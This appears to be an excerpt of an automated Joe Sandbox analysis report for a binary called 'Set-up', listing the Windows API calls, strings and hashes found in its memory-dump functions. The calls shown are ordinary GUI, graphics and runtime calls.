                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: charpattern$multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-578831968
                                                                                          • Opcode ID: 8a80ff15a6e97f504a1645c062c350cf253aac79a19a4e4e9bb652ad3f5c5f50
                                                                                          • Instruction ID: b2ba57a61f5783ba084d4c7031405dfe49155a5c0caf0f39028b4cc6c081b490
                                                                                          • Opcode Fuzzy Hash: 8a80ff15a6e97f504a1645c062c350cf253aac79a19a4e4e9bb652ad3f5c5f50
                                                                                          • Instruction Fuzzy Hash: 232126B07006045BD724BB28C846B2A77D1EF40714F1085E8E99A8B3C2EB7599198BCA
                                                                                          APIs
                                                                                          • OleInitialize.OLE32(00000000), ref: 00A6C3EF
                                                                                          • GetModuleHandleW.KERNEL32(user32.dll,?,?,?,?,?,?,70576E16), ref: 00A6C400
                                                                                          • GetProcAddress.KERNEL32(00000000,SetCoalescableTimer), ref: 00A6C414
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleInitializeModuleProc
                                                                                          • String ID: 2$SetCoalescableTimer$user32.dll
                                                                                          • API String ID: 3965314501-3203590622
                                                                                          • Opcode ID: 3b339088be4596d4f0660eb32aa5b754a2bdf60c5cd631096b1fa68e0648b162
                                                                                          • Instruction ID: f19e4dc2c87061da018c2831fbb8eb8b914097cf20f3585cb7fe70cc70320a72
                                                                                          • Opcode Fuzzy Hash: 3b339088be4596d4f0660eb32aa5b754a2bdf60c5cd631096b1fa68e0648b162
                                                                                          • Instruction Fuzzy Hash: CA41E6B11083468BE700CF14C81835BBBE0BF85758F55096CE5982B396CBBA960DCFCA
                                                                                          APIs
                                                                                          • strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,-0123456789,?,%.14g,?), ref: 00BED0AB
                                                                                          • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00BED0BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: localeconvstrspn
                                                                                          • String ID: %.14g$%lld$-0123456789$0
                                                                                          • API String ID: 737097207-4294742169
                                                                                          • Opcode ID: 38dfe886e3ae748fa395f6601095f3db2351c18ed481d00b1c47d3ee988362d7
                                                                                          • Instruction ID: 36fd9bbaae9d27a4b989d566fecc9f627387f9ab3b8e232e1d91c0c615e1400f
                                                                                          • Opcode Fuzzy Hash: 38dfe886e3ae748fa395f6601095f3db2351c18ed481d00b1c47d3ee988362d7
                                                                                          • Instruction Fuzzy Hash: 9D1108B16047809FC730AB78984596BFBE8AF85300F144DAEE5C7C3252EA71D554CB92
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00A6817D
                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00A68194
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00A681AB
                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00A681C2
                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00A681D9
                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00A681F0
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00A68207
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorLoad
                                                                                          • String ID:
                                                                                          • API String ID: 3238433803-0
                                                                                          • Opcode ID: d3bdf439014e5ab73c252825175362a893cf70d2532b527f6b04ad10afe43c37
                                                                                          • Instruction ID: 76a738fc3296fdbbda7941a7e4269bee76fd2ab7b31c56a78b47f8684c5f2337
                                                                                          • Opcode Fuzzy Hash: d3bdf439014e5ab73c252825175362a893cf70d2532b527f6b04ad10afe43c37
                                                                                          • Instruction Fuzzy Hash: 6511407158D208EFE3809FE0FC49B6C7BB0E704B02F1285A2F60E992D0CBB66010CB91
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?), ref: 00A8A27D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A8A2C8
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?), ref: 00A8A2D0
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00A8A3C3
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 00A8A41B
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00A8A424
                                                                                            • Part of subcall function 00A6B900: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00A75F13,?,?,00000040), ref: 00A6B905
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturn$Xlength_error@std@@malloc
                                                                                          • String ID:
                                                                                          • API String ID: 292149383-0
                                                                                          • Opcode ID: 9e72a1bd04e368868eb41a4e30babd8b47347e4f578e0b7c4926e8ab0f72243e
                                                                                          • Instruction ID: d853159c017214a979188772b7c7a73c052bce28139f65b0706610d0c26e16f1
                                                                                          • Opcode Fuzzy Hash: 9e72a1bd04e368868eb41a4e30babd8b47347e4f578e0b7c4926e8ab0f72243e
                                                                                          • Instruction Fuzzy Hash: FD817772A001059BDB25EF68D8809BEB7A5FF91314B2443BEE829CB351E731ED15C792
                                                                                          APIs
                                                                                          • CreateRectRgnIndirect.GDI32(?), ref: 00A6CB18
                                                                                          • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6CB2F
                                                                                          • CombineRgn.GDI32(00000000,00000000,?,00000004), ref: 00A6CB48
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A6CB5B
                                                                                          • DeleteObject.GDI32(?), ref: 00A6CB60
                                                                                          • DeleteObject.GDI32(?), ref: 00A6CB7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteObject$CreateRect$CombineIndirect
                                                                                          • String ID:
                                                                                          • API String ID: 343578399-0
                                                                                          • Opcode ID: 77e174dcc0e404a4a81a25b35031e21e283ae7e665b9d0bf8cd9c5c3fd3a369c
                                                                                          • Instruction ID: f64c7ee4d80c406f3f0df24d995a7fa9fcec2d4a782dcfd818ab701965f25437
                                                                                          • Opcode Fuzzy Hash: 77e174dcc0e404a4a81a25b35031e21e283ae7e665b9d0bf8cd9c5c3fd3a369c
                                                                                          • Instruction Fuzzy Hash: 3F41F7B2F0020EABCF017FD0D9467FEBBB4EF45790F204595E986B3291E62549258EC0
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00A692C4
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A6936C
                                                                                          • SendMessageW.USER32(?,000001A8,?,00000000), ref: 00A693F8
                                                                                          • SendMessageW.USER32(?,00000180,00000000,00000001), ref: 00A69410
                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00A69423
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00A69430
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$InvalidateRect_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 324257846-0
                                                                                          • Opcode ID: 57899c5ea2f4274152366976b2336fa2a6894b96445176a4405054f8c449fac8
                                                                                          • Instruction ID: 434d1fc44a651e3de573327b652fe97c92ae047d57d6920137b0574cdf968c81
                                                                                          • Opcode Fuzzy Hash: 57899c5ea2f4274152366976b2336fa2a6894b96445176a4405054f8c449fac8
                                                                                          • Instruction Fuzzy Hash: E151B131600205ABDF258F68CC84BAE7BBAAF88700F14815CE9569F3D5DB719945CB90
                                                                                          APIs
                                                                                          • ImmGetContext.IMM32(?), ref: 00A7294A
                                                                                          • ImmSetCompositionWindow.IMM32(00000000,00000002,?,?,?,?), ref: 00A729B9
                                                                                          • memset.VCRUNTIME140 ref: 00A72A14
                                                                                          • MulDiv.KERNEL32(?,?,00001C20), ref: 00A72A49
                                                                                          • ImmSetCompositionFontW.IMM32(00000000,?,?), ref: 00A72AA0
                                                                                          • ImmReleaseContext.IMM32(?,00000000), ref: 00A72ACB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: CompositionContext$FontReleaseWindowmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1667481158-0
                                                                                          • Opcode ID: d17d351faeb05767c78639403a5e3b1ab45819de866d4854d4eb4bab51e33177
                                                                                          • Instruction ID: b4a4c9cd6d8d5c24799a39263ad22bd6fe3eef81d0916e2a27c7beb08786a50b
                                                                                          • Opcode Fuzzy Hash: d17d351faeb05767c78639403a5e3b1ab45819de866d4854d4eb4bab51e33177
                                                                                          • Instruction Fuzzy Hash: 8051D270A002099FEB14CF64C889BADFBB9FF44304F14826DE40E97291DB356945CB90
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,00000000), ref: 00A74301
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00A74393
                                                                                            • Part of subcall function 00BFE3CE: EnterCriticalSection.KERNEL32(00C62BB4,?,?,?,00A6FD26,00C63028), ref: 00BFE3D9
                                                                                            • Part of subcall function 00BFE3CE: LeaveCriticalSection.KERNEL32(00C62BB4,?,?,?,00A6FD26,00C63028), ref: 00BFE416
                                                                                          • __Init_thread_footer.LIBCMT ref: 00A74356
                                                                                            • Part of subcall function 00BFE384: EnterCriticalSection.KERNEL32(00C62BB4,?,?,00A6FD46,00C63028), ref: 00BFE38E
                                                                                            • Part of subcall function 00BFE384: LeaveCriticalSection.KERNEL32(00C62BB4,?,?,00A6FD46,00C63028), ref: 00BFE3C1
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A743BA
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00A74405
                                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 00A74417
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CriticalSection$Long$EnterLeaveProc$Init_thread_footer
                                                                                          • String ID:
                                                                                          • API String ID: 2953339707-0
                                                                                          • Opcode ID: 0852d6fff9cb75aa87b0c627bb7a3c86a33434388bf033cccd2baa8f900f9000
                                                                                          • Instruction ID: 22764c5b26c8dcde1b7fc0358c9f9d782b2208d4f82f75550cffbd61347d28dd
                                                                                          • Opcode Fuzzy Hash: 0852d6fff9cb75aa87b0c627bb7a3c86a33434388bf033cccd2baa8f900f9000
                                                                                          • Instruction Fuzzy Hash: BB410472A04248EFDB11CF54DC45FAEBBB5FB48720F108169FA0697390C7729A10DBA1
                                                                                          APIs
                                                                                          • truncf.API-MS-WIN-CRT-MATH-L1-1-0(?,70576E16), ref: 00A6C88D
                                                                                          • truncf.API-MS-WIN-CRT-MATH-L1-1-0(?,70576E16), ref: 00A6C8A4
                                                                                          • GetSystemMetrics.USER32(00000044), ref: 00A6C8D5
                                                                                          • MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6C8E8
                                                                                          • GetSystemMetrics.USER32(00000045), ref: 00A6C92B
                                                                                          • MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6C93E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystemtruncf
                                                                                          • String ID:
                                                                                          • API String ID: 3296196346-0
                                                                                          • Opcode ID: 90c7c48e1cd78122e123f5144430a6b8eacd61866fad95d2be18bcea819ade62
                                                                                          • Instruction ID: 274a33ae9add0d1a495ef33581805402c823d2a7534b778dd9a29283cc94c78f
                                                                                          • Opcode Fuzzy Hash: 90c7c48e1cd78122e123f5144430a6b8eacd61866fad95d2be18bcea819ade62
                                                                                          • Instruction Fuzzy Hash: B8416871A0121AEFDB148F95D988BBEBF74FB04721F514559E9A573280C3346930CFA5
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63267
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A6326C
                                                                                            • Part of subcall function 00A6B270: memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B345
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00A63281
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A6328E
                                                                                          • Polygon.GDI32(?,00000000,?), ref: 00A632F5
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A63324
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BrushCreateDeletePolygonSolid_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3423700353-0
                                                                                          • Opcode ID: 8d10e1e1d26e952c68bedb31fa22d9c2bef57698c4aaa36dad9bde8d2b65e660
                                                                                          • Instruction ID: ff9495cb14c52c1d940d2b2653b3f9b081604f22d1cf48af238b3de45aa7baf5
                                                                                          • Opcode Fuzzy Hash: 8d10e1e1d26e952c68bedb31fa22d9c2bef57698c4aaa36dad9bde8d2b65e660
                                                                                          • Instruction Fuzzy Hash: 34415E76900609EFCF04DFA4CC44BAEBBB5FF48310F118229E915A7650D735AA55CF90
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000042), ref: 00A73159
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00A73169
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?), ref: 00A731A8
                                                                                          • GlobalAlloc.KERNEL32(00000042), ref: 00A731B8
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00A731C8
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?), ref: 00A731E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocByteCharLockMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 3395854362-0
                                                                                          • Opcode ID: a89f87ec4cc9d905db0f415e2566a4e46b01c23982f30c193e1889d78acfb186
                                                                                          • Instruction ID: b979df42a70edd58658843570ee0aba1a434ed1a53d882b77495d80a58134d51
                                                                                          • Opcode Fuzzy Hash: a89f87ec4cc9d905db0f415e2566a4e46b01c23982f30c193e1889d78acfb186
                                                                                          • Instruction Fuzzy Hash: DE2181726003019BCB10DF65DC89F6A7BB8EF45311F15866DF909DB291DB31D901DBA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$CreateFontIndirectlroundf
                                                                                          • String ID: en-us
                                                                                          • API String ID: 1453837966-3889756054
                                                                                          • Opcode ID: c6c6782ba6439e75dab2239e2084cbac9e912f0c0b2c4c946028eadcc6e3622e
                                                                                          • Instruction ID: bd16dff20a95963afff29ae58f42b3d078553a14ab079d0fa29a2cbc51212ff9
